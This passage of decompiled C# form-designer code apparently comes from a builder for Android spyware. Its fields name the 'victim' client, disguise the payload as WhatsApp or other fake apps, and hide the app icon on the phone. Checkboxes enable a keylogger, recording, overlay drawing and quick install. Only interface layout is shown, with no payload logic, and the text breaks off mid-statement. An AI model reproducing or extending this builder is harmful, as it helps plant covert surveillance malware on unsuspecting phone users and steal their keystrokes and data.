			this.fakepanel.Controls.Add(this.Textfakelink);
			this.fakepanel.Controls.Add(this.Textfakename);
			this.fakepanel.Controls.Add(this.Label23);
			this.fakepanel.Controls.Add(this.Label22);
			this.fakepanel.Enabled = false;
			this.fakepanel.Location = new global::System.Drawing.Point(413, 25);
			this.fakepanel.Margin = new global::System.Windows.Forms.Padding(4);
			this.fakepanel.Name = "fakepanel";
			this.fakepanel.Size = new global::System.Drawing.Size(510, 290);
			this.fakepanel.TabIndex = 40;
			this.Button1.BackColor = global::System.Drawing.Color.Black;
			this.Button1.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.Button1.Font = new global::System.Drawing.Font("Palatino Linotype", 10f, global::System.Drawing.FontStyle.Bold);
			this.Button1.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Button1.Location = new global::System.Drawing.Point(48, 204);
			this.Button1.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Button1.Name = "Button1";
			this.Button1.Size = new global::System.Drawing.Size(115, 58);
			this.Button1.TabIndex = 43;
			this.Button1.Text = "App icon";
			this.Button1.UseVisualStyleBackColor = false;
			this.Label27.AutoSize = true;
			this.Label27.BackColor = global::System.Drawing.Color.Transparent;
			this.Label27.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label27.ForeColor = global::System.Drawing.Color.White;
			this.Label27.Location = new global::System.Drawing.Point(172, 16);
			this.Label27.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label27.Name = "Label27";
			this.Label27.Size = new global::System.Drawing.Size(150, 30);
			this.Label27.TabIndex = 44;
			this.Label27.Text = "Custom App";
			this.fakeiconpic.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 45);
			this.fakeiconpic.Location = new global::System.Drawing.Point(323, 199);
			this.fakeiconpic.Margin = new global::System.Windows.Forms.Padding(4);
			this.fakeiconpic.Name = "fakeiconpic";
			this.fakeiconpic.Size = new global::System.Drawing.Size(97, 63);
			this.fakeiconpic.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.fakeiconpic.TabIndex = 42;
			this.fakeiconpic.TabStop = false;
			this.Textfakelink.BackColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.Textfakelink.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.Textfakelink.ForeColor = global::System.Drawing.Color.White;
			this.Textfakelink.Location = new global::System.Drawing.Point(203, 134);
			this.Textfakelink.Margin = new global::System.Windows.Forms.Padding(4);
			this.Textfakelink.Name = "Textfakelink";
			this.Textfakelink.Size = new global::System.Drawing.Size(301, 30);
			this.Textfakelink.TabIndex = 41;
			this.Textfakelink.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.Textfakename.BackColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.Textfakename.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.Textfakename.ForeColor = global::System.Drawing.Color.White;
			this.Textfakename.Location = new global::System.Drawing.Point(203, 74);
			this.Textfakename.Margin = new global::System.Windows.Forms.Padding(4);
			this.Textfakename.Name = "Textfakename";
			this.Textfakename.Size = new global::System.Drawing.Size(301, 30);
			this.Textfakename.TabIndex = 40;
			this.Textfakename.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.Label23.AutoSize = true;
			this.Label23.BackColor = global::System.Drawing.Color.Transparent;
			this.Label23.Font = new global::System.Drawing.Font("Palatino Linotype", 10f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label23.ForeColor = global::System.Drawing.Color.White;
			this.Label23.Location = new global::System.Drawing.Point(11, 144);
			this.Label23.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label23.Name = "Label23";
			this.Label23.Size = new global::System.Drawing.Size(149, 23);
			this.Label23.TabIndex = 39;
			this.Label23.Text = "App WebSite Link";
			this.Label22.AutoSize = true;
			this.Label22.BackColor = global::System.Drawing.Color.Transparent;
			this.Label22.Font = new global::System.Drawing.Font("Palatino Linotype", 10f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label22.ForeColor = global::System.Drawing.Color.White;
			this.Label22.Location = new global::System.Drawing.Point(11, 84);
			this.Label22.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label22.Name = "Label22";
			this.Label22.Size = new global::System.Drawing.Size(93, 23);
			this.Label22.TabIndex = 38;
			this.Label22.Text = "App Name";
			this.Label21.AutoSize = true;
			this.Label21.BackColor = global::System.Drawing.Color.Transparent;
			this.Label21.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label21.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label21.Location = new global::System.Drawing.Point(366, 136);
			this.Label21.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label21.Name = "Label21";
			this.Label21.Size = new global::System.Drawing.Size(26, 34);
			this.Label21.TabIndex = 39;
			this.Label21.Text = "?";
			this.ToolTip1.SetToolTip(this.Label21, "App change sking to new fake app.\r\nSelect Hidden App to hide completely.");
			this.combotype.AllowDrop = true;
			this.combotype.ArrowColor = global::System.Drawing.Color.FromArgb(110, 110, 110);
			this.combotype.BackColor = global::System.Drawing.Color.Transparent;
			this.combotype.BackgroundColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.combotype.BorderColor = global::System.Drawing.Color.FromArgb(110, 110, 110);
			this.combotype.CausesValidation = false;
			this.combotype.DisabledBackColor = global::System.Drawing.Color.FromArgb(80, 80, 80);
			this.combotype.DisabledBorderColor = global::System.Drawing.Color.FromArgb(109, 109, 109);
			this.combotype.DisabledForeColor = global::System.Drawing.Color.FromArgb(109, 109, 109);
			this.combotype.DrawMode = global::System.Windows.Forms.DrawMode.OwnerDrawFixed;
			this.combotype.DropDownStyle = global::System.Windows.Forms.ComboBoxStyle.DropDownList;
			this.combotype.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 11f);
			this.combotype.FormattingEnabled = true;
			this.combotype.IsDerivedStyle = true;
			this.combotype.ItemHeight = 20;
			this.combotype.Items.AddRange(new object[]
			{
				"Youtube lite",
				"Temp Mail",
				"Google Translate",
				"Wallpapers App",
				"App Store",
				"Proxy App",
				"Custom",
				"Hidden App"
			});
			this.combotype.Location = new global::System.Drawing.Point(235, 138);
			this.combotype.Margin = new global::System.Windows.Forms.Padding(4);
			this.combotype.Name = "combotype";
			this.combotype.SelectedItemBackColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.combotype.SelectedItemForeColor = global::System.Drawing.Color.White;
			this.combotype.Size = new global::System.Drawing.Size(123, 26);
			this.combotype.Style = global::MetroSet_UI.Enums.Style.Dark;
			this.combotype.StyleManager = null;
			this.combotype.TabIndex = 38;
			this.combotype.ThemeAuthor = "Narwin";
			this.combotype.ThemeName = "MetroDark";
			this.Label20.AutoSize = true;
			this.Label20.BackColor = global::System.Drawing.Color.Transparent;
			this.Label20.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label20.ForeColor = global::System.Drawing.Color.White;
			this.Label20.Location = new global::System.Drawing.Point(55, 140);
			this.Label20.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label20.Name = "Label20";
			this.Label20.Size = new global::System.Drawing.Size(160, 30);
			this.Label20.TabIndex = 37;
			this.Label20.Text = "• After Install";
			this.Label7.AutoSize = true;
			this.Label7.BackColor = global::System.Drawing.Color.Transparent;
			this.Label7.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label7.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label7.Location = new global::System.Drawing.Point(1336, 148);
			this.Label7.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label7.Name = "Label7";
			this.Label7.Size = new global::System.Drawing.Size(26, 34);
			this.Label7.TabIndex = 34;
			this.Label7.Text = "?";
			this.ToolTip1.SetToolTip(this.Label7, "Hide App icon From phone\r\nSet FakeApp To Hidden App\r\nto hide on Android 10/11");
			this.Label5.AutoSize = true;
			this.Label5.BackColor = global::System.Drawing.Color.Transparent;
			this.Label5.Enabled = false;
			this.Label5.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label5.ForeColor = global::System.Drawing.Color.White;
			this.Label5.Location = new global::System.Drawing.Point(1156, 331);
			this.Label5.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label5.Name = "Label5";
			this.Label5.Size = new global::System.Drawing.Size(91, 34);
			this.Label5.TabIndex = 26;
			this.Label5.Text = "• Hide";
			this.Label5.Visible = false;
			this.TabPage10.BackColor = global::System.Drawing.Color.White;
			this.TabPage10.Controls.Add(this.Panel2);
			this.TabPage10.Location = new global::System.Drawing.Point(0, 55);
			this.TabPage10.Name = "TabPage10";
			this.TabPage10.Size = new global::System.Drawing.Size(1075, 677);
			this.TabPage10.TabIndex = 2;
			this.TabPage10.Text = "information";
			this.Panel2.BackColor = global::System.Drawing.Color.Black;
			this.Panel2.Controls.Add(this.CheckHide);
			this.Panel2.Controls.Add(this.CheckIconPatch);
			this.Panel2.Controls.Add(this.randomverbtn);
			this.Panel2.Controls.Add(this.randomidbtn);
			this.Panel2.Controls.Add(this.Label11);
			this.Panel2.Controls.Add(this.Label4);
			this.Panel2.Controls.Add(this.Label9);
			this.Panel2.Controls.Add(this.Label3);
			this.Panel2.Controls.Add(this.Label2);
			this.Panel2.Controls.Add(this.TextNameVictim);
			this.Panel2.Controls.Add(this.TextNamePatch);
			this.Panel2.Controls.Add(this.TextVersion);
			this.Panel2.Controls.Add(this.TextPackage);
			this.Panel2.Controls.Add(this.PictureBox1);
			this.Panel2.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel2.Location = new global::System.Drawing.Point(0, 0);
			this.Panel2.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Panel2.Name = "Panel2";
			this.Panel2.Size = new global::System.Drawing.Size(1075, 677);
			this.Panel2.TabIndex = 15;
			this.CheckHide.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckHide.Checked = true;
			this.CheckHide.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckHide.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckHide.Location = new global::System.Drawing.Point(453, 581);
			this.CheckHide.Name = "CheckHide";
			this.CheckHide.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckHide.Size = new global::System.Drawing.Size(150, 29);
			this.CheckHide.TabIndex = 77;
			this.CheckHide.Text = "hide app";
			this.CheckHide.Visible = false;
			this.CheckIconPatch.CheckBoxColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.CheckIconPatch.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckIconPatch.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckIconPatch.Location = new global::System.Drawing.Point(451, 434);
			this.CheckIconPatch.Name = "CheckIconPatch";
			this.CheckIconPatch.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckIconPatch.Size = new global::System.Drawing.Size(44, 29);
			this.CheckIconPatch.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.CheckIconPatch.StyleCustomMode = true;
			this.CheckIconPatch.TabIndex = 76;
			this.randomverbtn.BackColor = global::System.Drawing.Color.FromArgb(50, 50, 50);
			this.randomverbtn.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("randomverbtn.BackgroundImage");
			this.randomverbtn.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Center;
			this.randomverbtn.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.randomverbtn.Font = new global::System.Drawing.Font("Palatino Linotype", 7f, global::System.Drawing.FontStyle.Bold);
			this.randomverbtn.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.randomverbtn.Location = new global::System.Drawing.Point(409, 293);
			this.randomverbtn.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.randomverbtn.Name = "randomverbtn";
			this.randomverbtn.Size = new global::System.Drawing.Size(47, 30);
			this.randomverbtn.TabIndex = 35;
			this.randomverbtn.TextAlign = global::System.Drawing.ContentAlignment.TopCenter;
			this.randomverbtn.UseVisualStyleBackColor = false;
			this.randomidbtn.BackColor = global::System.Drawing.Color.FromArgb(50, 50, 50);
			this.randomidbtn.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("randomidbtn.BackgroundImage");
			this.randomidbtn.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Center;
			this.randomidbtn.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.randomidbtn.Font = new global::System.Drawing.Font("Palatino Linotype", 7f, global::System.Drawing.FontStyle.Bold);
			this.randomidbtn.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.randomidbtn.Location = new global::System.Drawing.Point(932, 293);
			this.randomidbtn.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.randomidbtn.Name = "randomidbtn";
			this.randomidbtn.Size = new global::System.Drawing.Size(47, 30);
			this.randomidbtn.TabIndex = 34;
			this.randomidbtn.TextAlign = global::System.Drawing.ContentAlignment.TopCenter;
			this.randomidbtn.UseVisualStyleBackColor = false;
			this.Label11.AutoSize = true;
			this.Label11.BackColor = global::System.Drawing.Color.Transparent;
			this.Label11.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label11.ForeColor = global::System.Drawing.Color.White;
			this.Label11.Location = new global::System.Drawing.Point(517, 429);
			this.Label11.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label11.Name = "Label11";
			this.Label11.Size = new global::System.Drawing.Size(86, 34);
			this.Label11.TabIndex = 32;
			this.Label11.Text = "• Icon";
			this.Label4.AutoSize = true;
			this.Label4.BackColor = global::System.Drawing.Color.Transparent;
			this.Label4.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label4.ForeColor = global::System.Drawing.Color.White;
			this.Label4.Location = new global::System.Drawing.Point(688, 258);
			this.Label4.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label4.Name = "Label4";
			this.Label4.Size = new global::System.Drawing.Size(182, 30);
			this.Label4.TabIndex = 28;
			this.Label4.Text = "Package Name";
			this.Label9.AutoSize = true;
			this.Label9.BackColor = global::System.Drawing.Color.Transparent;
			this.Label9.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label9.ForeColor = global::System.Drawing.Color.White;
			this.Label9.Location = new global::System.Drawing.Point(188, 258);
			this.Label9.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label9.Name = "Label9";
			this.Label9.Size = new global::System.Drawing.Size(149, 30);
			this.Label9.TabIndex = 27;
			this.Label9.Text = "App Version";
			this.Label3.AutoSize = true;
			this.Label3.BackColor = global::System.Drawing.Color.Transparent;
			this.Label3.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label3.ForeColor = global::System.Drawing.Color.White;
			this.Label3.Location = new global::System.Drawing.Point(718, 119);
			this.Label3.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label3.Name = "Label3";
			this.Label3.Size = new global::System.Drawing.Size(130, 30);
			this.Label3.TabIndex = 26;
			this.Label3.Text = "App Name";
			this.Label2.AutoSize = true;
			this.Label2.BackColor = global::System.Drawing.Color.Transparent;
			this.Label2.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label2.ForeColor = global::System.Drawing.Color.White;
			this.Label2.Location = new global::System.Drawing.Point(185, 119);
			this.Label2.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label2.Name = "Label2";
			this.Label2.Size = new global::System.Drawing.Size(152, 30);
			this.Label2.TabIndex = 25;
			this.Label2.Text = "Client Name";
			this.TextNameVictim.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.TextNameVictim.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.TextNameVictim.Font = new global::System.Drawing.Font("Palatino Linotype", 9f, global::System.Drawing.FontStyle.Bold);
			this.TextNameVictim.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.TextNameVictim.Location = new global::System.Drawing.Point(120, 175);
			this.TextNameVictim.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.TextNameVictim.Name = "TextNameVictim";
			this.TextNameVictim.Size = new global::System.Drawing.Size(281, 28);
			this.TextNameVictim.TabIndex = 1;
			this.TextNameVictim.Text = "BOT";
			this.TextNameVictim.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.TextNamePatch.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.TextNamePatch.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.TextNamePatch.Font = new global::System.Drawing.Font("Palatino Linotype", 9f, global::System.Drawing.FontStyle.Bold);
			this.TextNamePatch.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.TextNamePatch.Location = new global::System.Drawing.Point(642, 175);
			this.TextNamePatch.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.TextNamePatch.Name = "TextNamePatch";
			this.TextNamePatch.Size = new global::System.Drawing.Size(281, 28);
			this.TextNamePatch.TabIndex = 2;
			this.TextNamePatch.Text = "WhatsApp";
			this.TextNamePatch.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.TextVersion.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.TextVersion.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.TextVersion.Font = new global::System.Drawing.Font("Palatino Linotype", 9f, global::System.Drawing.FontStyle.Bold);
			this.TextVersion.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.TextVersion.Location = new global::System.Drawing.Point(120, 293);
			this.TextVersion.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.TextVersion.Name = "TextVersion";
			this.TextVersion.ShortcutsEnabled = false;
			this.TextVersion.Size = new global::System.Drawing.Size(281, 28);
			this.TextVersion.TabIndex = 3;
			this.TextVersion.Text = "1.0.0.0";
			this.TextVersion.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.TextPackage.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.TextPackage.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.TextPackage.CharacterCasing = global::System.Windows.Forms.CharacterCasing.Lower;
			this.TextPackage.Font = new global::System.Drawing.Font("Palatino Linotype", 9f, global::System.Drawing.FontStyle.Bold);
			this.TextPackage.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.TextPackage.Location = new global::System.Drawing.Point(642, 293);
			this.TextPackage.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.TextPackage.MaxLength = 99;
			this.TextPackage.Name = "TextPackage";
			this.TextPackage.ShortcutsEnabled = false;
			this.TextPackage.Size = new global::System.Drawing.Size(281, 28);
			this.TextPackage.TabIndex = 23;
			this.TextPackage.Text = "org.appser.verapp";
			this.TextPackage.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.PictureBox1.BackColor = global::System.Drawing.Color.FromArgb(45, 45, 45);
			this.PictureBox1.Location = new global::System.Drawing.Point(451, 476);
			this.PictureBox1.Margin = new global::System.Windows.Forms.Padding(4);
			this.PictureBox1.Name = "PictureBox1";
			this.PictureBox1.Size = new global::System.Drawing.Size(136, 98);
			this.PictureBox1.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.PictureBox1.TabIndex = 33;
			this.PictureBox1.TabStop = false;
			this.TabPage11.BackColor = global::System.Drawing.Color.White;
			this.TabPage11.Controls.Add(this.Panel5);
			this.TabPage11.Location = new global::System.Drawing.Point(0, 40);
			this.TabPage11.Name = "TabPage11";
			this.TabPage11.Size = new global::System.Drawing.Size(450, 230);
			this.TabPage11.TabIndex = 3;
			this.TabPage11.Text = "Tools";
			this.Panel5.BackColor = global::System.Drawing.Color.Black;
			this.Panel5.Controls.Add(this.CheckBIND);
			this.Panel5.Controls.Add(this.CheckDraw);
			this.Panel5.Controls.Add(this.checkemo);
			this.Panel5.Controls.Add(this.CheckRecord);
			this.Panel5.Controls.Add(this.Checksuper);
			this.Panel5.Controls.Add(this.checkkeyloger);
			this.Panel5.Controls.Add(this.CheckQuick);
			this.Panel5.Controls.Add(this.Label35);
			this.Panel5.Controls.Add(this.Label36);
			this.Panel5.Controls.Add(this.explaintoolstext);
			this.Panel5.Controls.Add(this.Label33);
			this.Panel5.Controls.Add(this.Label34);
			this.Panel5.Controls.Add(this.Label17);
			this.Panel5.Controls.Add(this.Label26);
			this.Panel5.Controls.Add(this.trgtbkg);
			this.Panel5.Controls.Add(this.Label10);
			this.Panel5.Controls.Add(this.AutoRec);
			this.Panel5.Controls.Add(this.Label19);
			this.Panel5.Controls.Add(this.checkver);
			this.Panel5.Controls.Add(this.Label16);
			this.Panel5.Controls.Add(this.Label18);
			this.Panel5.Controls.Add(this.Label14);
			this.Panel5.Controls.Add(this.Label15);
			this.Panel5.Controls.Add(this.Label6);
			this.Panel5.Controls.Add(this.Label13);
			this.Panel5.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel5.Location = new global::System.Drawing.Point(0, 0);
			this.Panel5.Margin = new global::System.Windows.Forms.Padding(4);
			this.Panel5.Name = "Panel5";
			this.Panel5.Size = new global::System.Drawing.Size(450, 230);
			this.Panel5.TabIndex = 47;
			this.CheckBIND.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckBIND.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckBIND.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckBIND.Location = new global::System.Drawing.Point(277, 366);
			this.CheckBIND.Name = "CheckBIND";
			this.CheckBIND.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckBIND.Size = new global::System.Drawing.Size(44, 29);
			this.CheckBIND.TabIndex = 76;
			this.CheckDraw.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckDraw.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckDraw.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckDraw.Location = new global::System.Drawing.Point(654, 82);
			this.CheckDraw.Name = "CheckDraw";
			this.CheckDraw.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckDraw.Size = new global::System.Drawing.Size(44, 29);
			this.CheckDraw.TabIndex = 75;
			this.checkemo.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.checkemo.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.checkemo.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.checkemo.Location = new global::System.Drawing.Point(654, 169);
			this.checkemo.Name = "checkemo";
			this.checkemo.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.checkemo.Size = new global::System.Drawing.Size(44, 29);
			this.checkemo.TabIndex = 74;
			this.CheckRecord.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckRecord.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckRecord.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckRecord.Location = new global::System.Drawing.Point(654, 260);
			this.CheckRecord.Name = "CheckRecord";
			this.CheckRecord.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckRecord.Size = new global::System.Drawing.Size(44, 29);
			this.CheckRecord.TabIndex = 73;
			this.Checksuper.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.Checksuper.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.Checksuper.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.Checksuper.Location = new global::System.Drawing.Point(217, 259);
			this.Checksuper.Name = "Checksuper";
			this.Checksuper.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.Checksuper.Size = new global::System.Drawing.Size(44, 29);
			this.Checksuper.TabIndex = 72;
			this.checkkeyloger.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.checkkeyloger.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.checkkeyloger.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.checkkeyloger.Location = new global::System.Drawing.Point(217, 169);
			this.checkkeyloger.Name = "checkkeyloger";
			this.checkkeyloger.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.checkkeyloger.Size = new global::System.Drawing.Size(44, 29);
			this.checkkeyloger.TabIndex = 71;
			this.CheckQuick.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckQuick.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckQuick.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckQuick.Location = new global::System.Drawing.Point(217, 82);
			this.CheckQuick.Name = "CheckQuick";
			this.CheckQuick.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckQuick.Size = new global::System.Drawing.Size(44, 29);
			this.CheckQuick.TabIndex = 70;
			this.Label35.AutoSize = true;
			this.Label35.BackColor = global::System.Drawing.Color.Transparent;
			this.Label35.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label35.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label35.Location = new global::System.Drawing.Point(616, 77);
			this.Label35.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label35.Name = "Label35";
			this.Label35.Size = new global::System.Drawing.Size(26, 34);
			this.Label35.TabIndex = 69;
			this.Label35.Text = "?";
			this.Label36.AutoSize = true;
			this.Label36.BackColor = global::System.Drawing.Color.Transparent;
			this.Label36.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label36.ForeColor = global::System.Drawing.Color.White;
			this.Label36.Location = new global::System.Drawing.Point(727, 81);
			this.Label36.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label36.Name = "Label36";
			this.Label36.Size = new global::System.Drawing.Size(191, 30);
			this.Label36.TabIndex = 68;
			this.Label36.Text = "Draw Over Apps";
			this.explaintoolstext.AcceptsTab = true;
			this.explaintoolstext.BackColor = global::System.Drawing.Color.Black;
			this.explaintoolstext.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.explaintoolstext.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.explaintoolstext.Font = new global::System.Drawing.Font("Roboto", 11f);
			this.explaintoolstext.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.explaintoolstext.Location = new global::System.Drawing.Point(0, 136);
			this.explaintoolstext.Multiline = true;
			this.explaintoolstext.Name = "explaintoolstext";
			this.explaintoolstext.ReadOnly = true;
			this.explaintoolstext.Size = new global::System.Drawing.Size(450, 94);
			this.explaintoolstext.TabIndex = 66;
			this.Label33.AutoSize = true;
			this.Label33.BackColor = global::System.Drawing.Color.Transparent;
			this.Label33.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label33.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label33.Location = new global::System.Drawing.Point(173, 77);
			this.Label33.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label33.Name = "Label33";
			this.Label33.Size = new global::System.Drawing.Size(26, 34);
			this.Label33.TabIndex = 65;
			this.Label33.Text = "?";
			this.Label34.AutoSize = true;
			this.Label34.BackColor = global::System.Drawing.Color.Transparent;
			this.Label34.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label34.ForeColor = global::System.Drawing.Color.White;
			this.Label34.Location = new global::System.Drawing.Point(287, 81);
			this.Label34.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label34.Name = "Label34";
			this.Label34.Size = new global::System.Drawing.Size(152, 30);
			this.Label34.TabIndex = 64;
			this.Label34.Text = "Quick install";
			this.Label17.AutoSize = true;
			this.Label17.BackColor = global::System.Drawing.Color.Transparent;
			this.Label17.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
